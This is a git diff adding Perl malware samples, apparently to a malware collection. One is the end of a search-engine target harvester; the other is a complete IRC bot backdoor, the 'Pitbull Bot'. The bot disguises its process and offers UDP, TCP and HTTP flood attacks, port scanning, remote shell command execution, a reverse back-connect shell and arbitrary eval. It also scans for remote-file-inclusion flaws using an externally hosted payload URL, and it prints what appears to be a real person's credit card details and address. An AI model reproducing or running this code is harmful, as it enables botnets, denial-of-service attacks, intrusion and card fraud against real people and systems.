+    my $Res  = query($site);
+
+    while ( $Res =~ m/<br>uname -a:(.+?)\<br>/g ) {
+        $un = $1;
+    }
+    while ( $Res =~ m/<br>uptime:(.+?)\<br>/g ) {
+        $up = $1;
+    }
+    while ( $Res =~ m/<br>id:(.+?)\<br>/g ) {
+        $id1 = $1;
+    }
+    while ( $Res =~ m/<br>pwd:(.+?)\<br>/g ) {
+        $pwd1 = $1;
+    }
+    while ( $Res =~ m/<br>php:(.+?)\<br>/g ) {
+        $php1 = $1;
+    }
+    while ( $Res =~ m/<br>software:(.+?)\<br>/g ) {
+        $sof1 = $1;
+    }
+    while ( $Res =~ m/<br>server-ip:(.+?)\<br>/g ) {
+        $ip1 = $1;
+    }
+    while ( $Res =~ m/<br>server-name:(.+?)\<br>/g ) {
+        $name1 = $1;
+    }
+    while ( $Res =~ m/<br>os:(.+?)\<br>/g ) {
+        $os = $1;
+    }
+    while ( $Res =~ m/<br>free:(.+?)\<br>/g ) {
+        $free = $1;
+    }
+    while ( $Res =~ m/<br>used:(.+?)\<br>/g ) {
+        $used = $1;
+    }
+    while ( $Res =~ m/<br>total:(.+?)\<br>/g ) {
+        $all = $1;
+    }
+}
+
+sub googlet {
+    my @dominios = (
+        "ae", "com.ar", "at", "com.au", "be", "com.br",
+        "ca", "ch",     "cl", "de",     "dk"
+    );
+    my @country =
+      ( "AE", "AR", "AT", "AU", "BE", "BR", "CA", "CH", "CL", "DE", "DK" );
+    my @lst;
+    my $key = key( $_[0] );
+    my $c   = 0;
+    foreach my $i (@dominios) {
+        my @lista = google( $i, $key, $country[$c] );
+        push( @lst, @lista );
+        $c++;
+    }
+    return @lst;
+}
+
+sub google() {
+    my @lst;
+    my $i       = $_[0];
+    my $key     = $_[1];
+    my $country = $_[2];
+    for ( $b = 0 ; $b <= 100 ; $b += 100 ) {
+        my $Go =
+          (     "www.google." . $i
+              . "/search?hl=en&q="
+              . key($key)
+              . "&num=100&start="
+              . $b
+              . "&meta=cr%3Dcountry"
+              . $country );
+        my $Res = query($Go);
+        while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
+            if ( $1 !~ /google/ ) {
+                my $k    = $1;
+                my @grep = links($k);
+                push( @lst, @grep );
+            }
+        }
+    }
+    return @lst;
+}
+
+
+sub alltheweb() {
+    my @lst;
+    my $key = $_[0];
+    my $i   = 0;
+    my $pg  = 0;
+    for ( $i = 0 ; $i <= 1000 ; $i += 100 ) {
+        my $all =
+          ( "http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q="
+              . key($key) . "&o="
+              . $i );
+        my $Res = query($all);
+        while ( $Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) {
+            my $k = $1;
+            $k =~ s/ //g;
+            my @grep = links($k);
+            push( @lst, @grep );
+        }
+    }
+    return @lst;
+}
+
+sub altavista() {
+    my @lst;
+    my $key = $_[0];
+    for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
+        my $AlT =
+          ( "http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q="
+              . key($key) . "&stq="
+              . $b );
+        my $Res = query($AlT);
+        while ( $Res =~ m/<span class=ngrn>(.+?)\//g ) {
+            if ( $1 !~ /altavista/ ) {
+                my $k = $1;
+                $k =~ s/<//g;
+                $k =~ s/ //g;
+                my @grep = links($k);
+                push( @lst, @grep );
+            }
+        }
+        if   ( $Res =~ /target=\"_self\">Succ/ ) { }
+        else                                     { return @lst; }
+    }
+    return @lst;
+}
+
+
+sub uolsub() {
+    my @lst;
+    my $key = $_[0];
+    for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
+        my $UoL =
+          (     "http://busca.uol.com.br/www/index.html?q="
+              . key($key)
+              . "&start="
+              . $i );
+        my $Res = query($UoL);
+        while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) {
+            my $k = $1;
+            if ( $k !~ /busca|uol|yahoo/ ) {
+                my $k    = $1;
+                my @grep = links($k);
+                push( @lst, @grep );
+            }
+        }
+    }
+    return @lst;
+}
+
+sub search() {
+    my $key = $_[0];
+    my $i   = 1;
+    my $pg  = 80;
+    my @lst;
+    my $av = 1;
+    while ( $i <= $pg ) {
+        my $search = "http://www.search.com/search?q=$key";
+        my $req    = HTTP::Request->new( GET => $search );
+        my $ua     = LWP::UserAgent->new();
+        $ua->agent('Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000');
+        my $response = $ua->request($req);
+        my $resp     = $response->content;
+        while ( $resp =~ m/<a href=\"?http:\/\/(.+?)\//g ) {
+            if ( $1 !~ /msn|live|google|yahoo/ ) {
+                my $ok = "$1/";
+                push( @lst, $ok );
+            }
+        }
+        $av = $av + 10;
+        $i++;
+    }
+    return @lst;
+}
+
+sub searchs() {
+    my @lst;
+    my $key = $_[0];
+    for ( $b = 1 ; $b <= 100 ; $b++ ) {
+        my $sc =
+          ( "http://www.search.com/search?q=" . key($key) . "&nav=" . $b );
+        my $Res = query($sc);
+        while ( $Res =~ m/<a href=\"?http:\/\/(.+?)/g ) {
+            my $k    = $1;
+            my @grep = links($k);
+            push( @lst, @grep );
+        }
+    }
+    return @lst;
+}
+
+sub msn() {
+    my @lst;
+    my $key = $_[0];
+    for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
+        my $MsN =
+          (     "http://search.live.com/results.aspx?q="
+              . key($key)
+              . "&first="
+              . $b
+              . "&FORM=PERE" );
+        my $Res = query($MsN);
+        while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
+            if ( $1 !~ /msn|live/ ) {
+                my $k    = $1;
+                my @grep = links($k);
+                push( @lst, @grep );
+            }
+        }
+    }
+    return @lst;
+}
+
+sub ask() {
+    my @lst;
+    my $key = $_[0];
+    my $i   = 0;
+    my $pg  = 0;
+    for ( $i = 0 ; $i <= 1000 ; $i += 10 ) {
+        my $Ask =
+          (     "http://it.ask.com/web?q="
+              . key($key)
+              . "&o=312&l=dir&qsrc=0&page="
+              . $i
+              . "&dm=all" );
+        my $Res = query($Ask);
+        while ( $Res =~
+            m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g )
+        {
+            my $k = $3;
+            $k =~ s/[\"\ ]//g;
+            my @grep = links($k);
+            push( @lst, @grep );
+        }
+    }
+    return @lst;
+}
+
+sub fireball() {
+    my $key    = $_[0];
+    my $inizio = 1;
+    my $pagine = 200;
+    my @lst;
+    my $av = 0;
+    while ( $inizio <= $pagine ) {
+        my $fireball =
+            "http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query="
+          . key($key)
+          . "&cat=fb_loc&idx=all&enc=utf-8";
+        my $Res = query($fireball);
+        while ( $Res =~ m/<a href=\"?http:\/\/(.+?)\//g ) {
+            if ( $1 !~ /msn|live|google|yahoo/ ) {
+                my $k    = "$1/";
+                my @grep = links($k);
+                push( @lst, @grep );
+            }
+        }
+        $av = $av + 10;
+        $inizio++;
+    }
+    return @lst;
+}
+
+sub links() {
+    my @l;
+    my $link = $_[0];
+    my $host = $_[0];
+    my $hdir = $_[0];
+    $hdir =~ s/(.*)\/[^\/]*$/\1/;
+    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    $host .= "/";
+    $link .= "/";
+    $hdir .= "/";
+    $host =~ s/\/\//\//g;
+    $hdir =~ s/\/\//\//g;
+    $link =~ s/\/\//\//g;
+    push( @l, $link, $host, $hdir );
+    return @l;
+}
+
+sub geths() {
+    my $host = $_[0];
+    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    return $host;
+}
+
+sub key() {
+    my $dork = $_[0];
+    $dork =~ s/ /\+/g;
+    $dork =~ s/:/\%3A/g;
+    $dork =~ s/\//\%2F/g;
+    $dork =~ s/&/\%26/g;
+    $dork =~ s/\"/\%22/g;
+    $dork =~ s/,/\%2C/g;
+    $dork =~ s/\\/\%5C/g;
+    return $dork;
+}
+
+sub end() {
+    $string = $_[0];
+    $string .= "/";
+    $string =~ s/\/\//\//;
+    while ( $string =~ /\/\// ) {
+        $string =~ s/\/\//\//;
+    }
+    return ($string);
+}
+
+sub query($) {
+    my $url = $_[0];
+    $url =~ s/http:\/\///;
+    my $host  = $url;
+    my $query = $url;
+    my $page  = "";
+    $host  =~ s/href=\"?http:\/\///;
+    $host  =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    $query =~ s/$host//;
+    if ( $query eq "" ) { $query = "/"; }
+    eval {
+        my $sock = IO::Socket::INET->new(
+            PeerAddr => "$host",
+            PeerPort => "80",
+            Proto    => "tcp"
+        ) or return;
+        print $sock
+"GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+        my @r = <$sock>;
+        $page = "@r";
+        close($sock);
+    };
+    return $page;
+}
+
+sub get_link() {
+    my $file_print = $_[1];
+    my $link       = $_[0];
+    my $host       = $_[0];
+    my $host_dir   = $_[0];
+    my @links;
+    $host_dir =~ s/(.*)\/[^\/]*$/\1/;
+    $host     =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    $host_dir = &end($host_dir);
+    $host     = &end($host);
+    $link     = &end($host);
+    push( @links, $link, $host, $host_dir );
+    open( $file, '>>', $file_print );
+    print $file "$link\n$host_dir\n$host\n";
+    close($file);
+    return @links;
+}
+
+sub unici {
+    my @unici = ();
+    my %visti = ();
+    foreach my $elemento (@_) {
+        $elemento =~ s/\/+/\//g;
+        next if $visti{$elemento}++;
+        push @unici, $elemento;
+    }
+    return @unici;
+}
diff --git a/Perl/Backdoor.Perl.IRCBot.v b/Perl/Backdoor.Perl.IRCBot.v
new file mode 100644
index 00000000..e1810923
--- /dev/null
+++ b/Perl/Backdoor.Perl.IRCBot.v
@@ -0,0 +1,1075 @@
+# Pitbull Bot
+# Only for priv8 use !
+# 
+# Commands :
+# 
+# Scan..............: !bot @scan TIME index.php?page= inurl:"index.php?page="+site:id
+# Udp-flood.....: !bot @udpflood IP PACKET-SIZE TIME
+# Tcp-flood.....: !bot @tcpflood IP PORT TIME
+# Http-flood....: !bot @httpflood www.website.com TIME
+# Portscan.......: !bot @portscan www.website.com
+#
+# More Features Coming....
+
+use HTTP::Request;
+require HTTP::Request;
+require LWP::UserAgent;
+use LWP::UserAgent;
+
+
+my $processo = '/usr/bin/bash';
+
+
+
+#CONFIGURATION
+
+my $linas_max='8';
+
+my $sleep='5';
+
+my @cmdstring='http://az.co.cz/foto/c9.txt?';
+
+my @adms=("SuPrEmO","JaheeM","R3DF0X","ZEROCOOL","FaStiDiO");
+
+my @canais=("#r4k3t");
+
+my @nickname = ("UnIX|0000");
+
+
+my $nick = $nickname[rand scalar @nickname];
+
+my $ircname ='rox|';
+
+
+chop (my $realname = 'Hansje');
+
+$servidor='211.21.73.10' unless $servidor;
+
+my $porta='6667';
+
+my $VERSAO = '11,1 unlocker BOT';
+
+$SIG{'INT'} = 'IGNORE';
+
+$SIG{'HUP'} = 'IGNORE';
+
+$SIG{'TERM'} = 'IGNORE';
+
+$SIG{'CHLD'} = 'IGNORE';
+
+$SIG{'PS'} = 'IGNORE';
+
+use IO::Socket;
+
+use Socket;
+
+use IO::Select;
+
+chdir("/");
+
+#Connect
+
+$servidor="$ARGV[0]" if $ARGV[0];
+
+$0="$processo"."\0"x16;;
+
+my $pid=fork;
+
+exit if $pid;
+
+die "Masalah fork: $!" unless defined($pid);
+
+
+
+
+our %irc_servers;
+
+our %DCC;
+
+my $dcc_sel = new IO::Select->new();
+
+
+$sel_cliente = IO::Select->new();
+
+sub sendraw {
+
+  if ($#_ == '1') {
+
+    my $socket = $_[0];
+
+    print $socket "$_[1]\n";
+
+    } else {
+
+    print $IRC_cur_socket "$_[0]\n";
+
+  }
+
+}
+
+
+
+sub conectar {
+
+  my $meunick = $_[0];
+
+  my $servidor_con = $_[1];
+
+  my $porta_con = $_[2];
+
+
+  my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
+  PeerPort=>$porta_con) or return(1);
+
+  if (defined($IRC_socket)) {
+
+    $IRC_cur_socket = $IRC_socket;
+
+
+    $IRC_socket->autoflush(1);
+
+    $sel_cliente->add($IRC_socket);
+
+
+    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+
+    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+
+    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+
+    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+
+    nick("$meunick");
+
+    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+
+    sleep 1;
+
+  }
+
+}
+
+my $line_temp;
+
+while( 1 ) {
+
+  while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+
+  delete($irc_servers{''}) if (defined($irc_servers{''}));
+
+  my @ready = $sel_cliente->can_read(0);
+
+  next unless(@ready);
+
+  foreach $fh (@ready) {
+
+    $IRC_cur_socket = $fh;
+
+    $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+
+    $nread = sysread($fh, $msg, 4096);
+
+    if ($nread == 0) {
+
+      $sel_cliente->remove($fh);
+
+      $fh->close;
+
+      delete($irc_servers{$fh});
+
+    }
+
+    @lines = split (/\n/, $msg);
+
+
+
+    for(my $c=0; $c<= $#lines; $c++) {
+
+      $line = $lines[$c];
+
+      $line=$line_temp.$line if ($line_temp);
+
+      $line_temp='';
+
+      $line =~ s/\r$//;
+
+      unless ($c == $#lines) {
+
+        parse("$line");
+
+        } else {
+
+        if ($#lines == 0) {
+
+          parse("$line");
+
+          } elsif ($lines[$c] =~ /\r$/) {
+          parse("$line");
+
+          } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+
+          parse("$line"); 
+          	   } else {
+
+          	               $line_temp = $line;
+
+        }
+
+      }
+
+    }
+
+  }
+
+}
+
+
+
+sub parse {
+
+  my $servarg = shift;
+
+  if ($servarg =~ /^PING \:(.*)/) {
+
+    sendraw("PONG :$1");
+
+    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+
+    my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
+
+    if ($args =~ /^\001VERSION\001$/) {
+
+      	 notice("$pn", "\001VERSION mIRC v6.17 PitBull\001");
+
+    }
+
+    if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
+
+    if ($onde eq "$meunick"){
+
+    shell("$pn", "$args");
+
+  }
+
+  if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/ ) {
+
+    my $natrix = $1;
+
+    my $arg = $2;
+
+    if ($arg =~ /^\!(.*)/) {
+
+      ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
+
+      } elsif ($arg =~ /^\@(.*)/) {
+
+      $ondep = $onde;
+
+      $ondep = $pn if $onde eq $meunick;
+      bfunc("$ondep","$1");
+
+      } else {
+
+      shell("$onde", "$arg");
+
+    }
+
+  }
+
+}
+
+}
+
+elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+
+if (lc($1) eq lc($meunick)) {
+
+  $meunick=$4;
+  $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+
+}
+
+} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+
+nick("$meunick|".int rand(999999));
+
+} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+
+$meunick = $2;
+
+$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+
+$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+
+foreach my $canal (@canais) {
+
+  sendraw("JOIN $canal ddosit");
+
+}
+
+}
+
+}
+
+
+
+
+sub bfunc {
+
+my $printl = $_[0];
+
+my $funcarg = $_[1];
+
+if (my $pid = fork) {
+
+waitpid($pid, 0);
+
+} else {
+
+if (fork) {
+
+  exit;
+
+} else {
+
+if ($funcarg =~ /^portscan (.*)/) {
+
+  my $hostip="$1";
+
+  my
+
+
+  @portas=("21","22");
+
+  my (@aberta, %porta_banner);
+
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9Scan12] 12De Poorten van 7".$1." 12worden gescanned [DEV STATUS] .");
+
+  foreach my $porta (@portas)  {
+
+    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
+
+    'tcp', Timeout => 4);
+
+    if ($scansock) {
+
+      push (@aberta, $porta);
+
+      $scansock->close;
+
+    }
+
+  }
+
+
+  if (@aberta) {
+
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9Scan12] 12Open poort gevonden: @aberta");
+
+    } else {
+
+    sendraw($IRC_cur_socket,"PRIVMSG $printl :12[9Scan12] 12Geen open poorten gevonden");
+
+  }
+
+}
+
+           if ($funcarg =~ /^join (.*)/) {
+              sendraw($IRC_cur_socket, "JOIN ".$1);
+           }
+           if ($funcarg =~ /^part (.*)/) {
+              sendraw($IRC_cur_socket, "PART ".$1);
+           }
+
+if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+
+
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9TCP DDoSing12] 12Attacking ".$1.":".$2." for ".$3." 12seconden.");
+
+  my $itime = time;
+
+  my ($cur_time);
+
+  $cur_time = time - $itime;
+
+  while ($3>$cur_time){
+
+  $cur_time = time - $itime;
+
+  &tcpflooder("$1","$2","$3");
+
+}
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :PRIVMSG $printl :12[9TCP DDoSing12] 12Attack done ".$1.":".$2.".");
+
+}
+
+# COMMAND HELP
+
+if ($funcarg =~ /^commands/) {
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 Commando's : 3[7 ddos, scanner, poortscan, version  3]4 Gebruik !bot 7@woord " .  $VERSAO);
+
+}
+
+if ($funcarg =~ /^ddos/) {
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 !bot 9@7udpflood IP PACKET-SIZE TIME, !bot 9@7tcpflood IP PORT TIME, !bot 9@7httpflood www.website.com TIME  " .  $VERSAO);
+
+}
+
+if ($funcarg =~ /^scanner/) {
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 !bot 9@7scan TIME vuln+site:id  " .  $VERSAO);
+
+}
+
+if ($funcarg =~ /^poortscan/) {
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 !bot 9@7portscan IP/SITE  " .  $VERSAO);
+
+}
+
+if ($funcarg =~ /^version/) {
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 Sexy Version xD  " .  $VERSAO);
+
+}
+
+if ($funcarg =~ /^bugs/) {
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 Sexy Version xD  " .  $VERSAO);
+
+}
+
+if ($funcarg =~ /^cc/) {
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :$VERSAO 7 creditCardInfo_cardType: 4,Card Type : Visa Card,ccnum: 4791070124539980,creditCardInfo_expirationDate_month: jan,creditCardInfo_expirationDate_year: 2008,cvv: 996,pin: N/A,nameFirst: Desiree M,nameLast: Pramuk,addressStreet1: 2207 Lake Ave,addressStreet2:,addressApt:,addressCity: Whiting,addressState: IN,addressZipCode: 46394,phoneDay: 219-...,phoneEvening: 219-659-1199   " .  $VERSAO);
+
+}
+
+if ($funcarg =~ /^open(\S+)/) {
+my $site = $1;
+$request = HTTP::Request->new(GET => "$site");
+$ua = LWP::UserAgent->new;
+ $response = $ua->request($request);
+
+}
+
+
+
+
+
+if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
+
+my $host = "$1";
+
+my $porta = "$2";
+
+my $proto = getprotobyname('tcp');
+
+my $iaddr = inet_aton($host);
+
+my $paddr = sockaddr_in($porta, $iaddr);
+
+my $shell = "/bin/sh -i";
+
+if ($^O eq "MSWin32") {
+
+  $shell = "cmd.exe";
+
+}
+
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
+
+connect(SOCKET, $paddr) or die "connect: $!";
+
+open(STDIN, ">&SOCKET");
+
+open(STDOUT, ">&SOCKET");
+
+open(STDERR, ">&SOCKET");
+
+system("$shell");
+
+close(STDIN);
+
+close(STDOUT);
+
+close(STDERR);
+
+
+if ($estatisticas)
+
+{
+
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9BackConnect12]: Bezig met het connecteren naar $host:$porta");
+
+}
+
+}
+
+
+#SCANNER
+
+if ($funcarg =~ /^scan\s+(\d+)\s+(.*)\s+(.*)/) {
+
+@gstring = $3;
+
+$boturl=$2;
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,1Scan key 4".$3." 11Vuln 4".$boturl." 11Voor 4".$1." 11seconden.");
+
+srand;
+
+my $itime = time;
+
+my ($cur_time);
+
+my ($exploited);
+
+$boturl=$2;
+
+$cur_time = time - $itime;$exploited = 0;
+
+while($1>$cur_time){
+
+$cur_time = time - $itime;
+
+@urls=fetch();
+
+foreach $url (@urls) {
+
+  $cur_time = time - $itime;
+
+  sendraw($IRC_cur_socket, "PRIVMSG #debug :15(7@2Scan15) 15(2Exploiting7:12 ".$url2." 15)");
+  my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
+
+  $url2 ="http://".$path."/".$boturl."@cmdstring?";
+
+
+  print "\n".$url2."\n\n";
+
+
+
+
+
+  my $req=HTTP::Request->new(GET=>$url2);
+
+  my $ua=LWP::UserAgent->new();
+
+  $ua->timeout(10);
+
+  my $response=$ua->request($req);
+
+
+  if ($response->is_success) {
+
+    if( $response->content =~ /By/ && $response->content =~ /Hamkar/ ){
+
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Target15) 4".$url2."\n\n");
+
+  }
+
+}
+
+else {
+}
+
+}
+
+}
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,1Scan Hamkar ".$1." time.");
+
+}
+
+if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9HTTP DDoSing12] 12Attacking ".$1."12 Op poort 80 voor  ".$2." 12seconden.");
+
+my $itime = time;
+
+my ($cur_time);
+
+$cur_time = time - $itime;
+
+while ($2>$cur_time){
+
+$cur_time = time - $itime;
+
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+
+print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+
+close($socket);
+
+}
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9HTTP DDoSing12] 12Attacking done ".$1.".");
+
+}
+
+if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9UDP DDoSing12] 12Attacking ".$1." 12met ".$2."12 Kb aan packets voor ".$3." 12seconden.");
+
+my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
+
+$dtime = 1 if $dtime == 0;
+
+my %bytes;
+
+$bytes{igmp} = $2 * $pacotes{igmp};
+
+$bytes{icmp} = $2 * $pacotes{icmp};
+
+$bytes{o} = $2 * $pacotes{o};
+
+$bytes{udp} = $2 * $pacotes{udp};
+
+$bytes{tcp} = $2 * $pacotes{tcp};
+
+sendraw($IRC_cur_socket, "PRIVMSG $printl :12[9UDP DDoSing12] 12Resultaten ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in ".$dtime." 12seconden naar ".$1.".");
+
+}
+
+exit;
+
+}
+
+}
+
+}
+
+
+
+sub ircase {
+
+my ($kem, $printl, $case) = @_;
+
+
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   }
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+
+if ($case =~ /^rejoin\s+(.*)/) {
+
+my $chan = $1;
+
+if ($chan =~ /^(\d+) (.*)/) {
+
+for (my $ca = 1; $ca <= $1; $ca++ ) {
+
+p("$2");
+
+j("$2");
+
+}
+
+}
+else {
+
+p("$chan");
+
+j("$chan");
+
+}
+
+}
+
+if ($case =~ /^op/) {
+
+op("$printl", "$kem") if $case eq "op";
+
+my $oarg = substr($case, 3);
+
+op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+
+}
+
+if ($case =~ /^deop/) {
+
+deop("$printl", "$kem") if $case eq "deop";
+
+my $oarg = substr($case, 5);
+
+deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+
+}
+
+if ($case =~ /^msg\s+(\S+) (.*)/) {
+
+msg("$1", "$2");
+
+}
+
+if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+
+for (my $cf = 1; $cf <= $1; $cf++) {
+
+msg("$2", "$3");
+
+}
+
+}
+
+if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+
+ctcp("$1", "$2");
+
+}
+
+if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+
+for (my $cf = 1; $cf <= $1; $cf++) {
+
+ctcp("$2", "$3");
+
+}
+
+}
+
+if ($case =~ /^nick (.*)/) {
+
+nick("$1");
+
+}
+
+if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
+
+conectar("$2", "$1", 6667);
+
+}
+
+if ($case =~ /^raw (.*)/) {
+
+sendraw("$1");
+
+}
+
+if ($case =~ /^eval (.*)/) {
+
+eval "$1";
+
+}
+
+}
+
+
+sub shell {
+
+my $printl=$_[0];
+
+my $comando=$_[1];
+
+if ($comando =~ /cd (.*)/) {
+
+chdir("$1") || msg("$printl", "No such file or directory");
+
+return;
+
+}
+
+elsif ($pid = fork) {
+
+waitpid($pid, 0);
+
+}
+else {
+
+if (fork) {
+
+exit;
+
+} else {
+
+my @resp=`$comando 2>&1 3>&1`;
+
+my $c=0;
+
+foreach my $linha (@resp) {
+
+  $c++;
+
+  chop $linha;
+
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+
+  if ($c == "$linas_max") {
+
+    $c=0;
+
+    sleep $sleep;
+
+  }
+
+}
+
+exit;
+
+}
+
+}
+
+}
+
+
+
+sub tcpflooder {
+
+my $itime = time;
+
+my ($cur_time);
+
+my ($ia,$pa,$proto,$j,$l,$t);
+
+$ia=inet_aton($_[0]);
+
+$pa=sockaddr_in($_[1],$ia);
+
+$ftime=$_[2];
+
+$proto=getprotobyname('tcp');
+
+$j=0;$l=0;
+
+$cur_time = time - $itime;
+
+while ($l<1000){
+
+$cur_time = time - $itime;
+
+last if $cur_time >= $ftime;
+
+$t="SOCK$l";
+
+socket($t,PF_INET,SOCK_STREAM,$proto);
+
+connect($t,$pa)||$j--;
+
+$j++;$l++;
+
+}
+
+$l=0;
+
+while ($l<1000){
+
+$cur_time = time - $itime;
+
+last if $cur_time >= $ftime;
+
+$t="SOCK$l";
+
+shutdown($t,2);
+
+$l++;
+
+}
+
+}
+
+
+
+sub udpflooder {
+
+my $iaddr = inet_aton($_[0]);
+
+my $msg = 'A' x $_[1];
+
+my $ftime = $_[2];
+
+my $cp = 0;
+
+my (%pacotes);
+
+$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+
+
+
+socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+
+
+socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+
+socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+
+socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+
+return(undef) if $cp == 4;
+
+my $itime = time;
+
+my ($cur_time);
+
+while ( 1 ) {
+
+for (my $porta = 1;
+$porta <= 65000; $porta++) {
+
+$cur_time = time - $itime;
+
+last if $cur_time >= $ftime;
+
+send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+
+send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+
+send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+
+send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+
+for (my $pc = 3;
+$pc <= 255;$pc++) {
+
+next if $pc == 6;
+
+$cur_time = time - $itime;
+
+last if $cur_time >= $ftime;
+
+socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+
+send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
+
+}
+
+}
+
+last if $cur_time >= $ftime;
+
+}
+
+return($cur_time, %pacotes);
+
+}
+
+
+
+sub ctcp {
+
+return unless $#_ == 1;
+
+sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+
+}
+
+sub msg {
+
+return unless $#_ == 1;
+
+sendraw("PRIVMSG $_[0] :$_[1]");
+
+}
+
+sub notice {
+
+return unless $#_ == 1;
+
+sendraw("NOTICE $_[0] :$_[1]");
+
+}
+
+sub op {
+
+return unless $#_ == 1;
+
+sendraw("MODE $_[0] +o $_[1]");
+
+}
+
+sub deop {
+
+return unless $#_ == 1;
+
+sendraw("MODE $_[0] -o $_[1]");
+
+}
+
+sub j {
+&join(@_);
+}
+
+sub join {
+
+return unless $#_ == 0;
+
+sendraw("JOIN $_[0]");
+
+}
+
+sub p { part(@_);
+}
+
+sub part {
+
+sendraw("PART $_[0]");
+
+}
+
+sub nick {
+
+return unless $#_ == 0;
+
+sendraw("NICK $_[0]");
+
+}
+
+sub quit {
+
+sendraw("QUIT :$_[0]");
+
+}
+
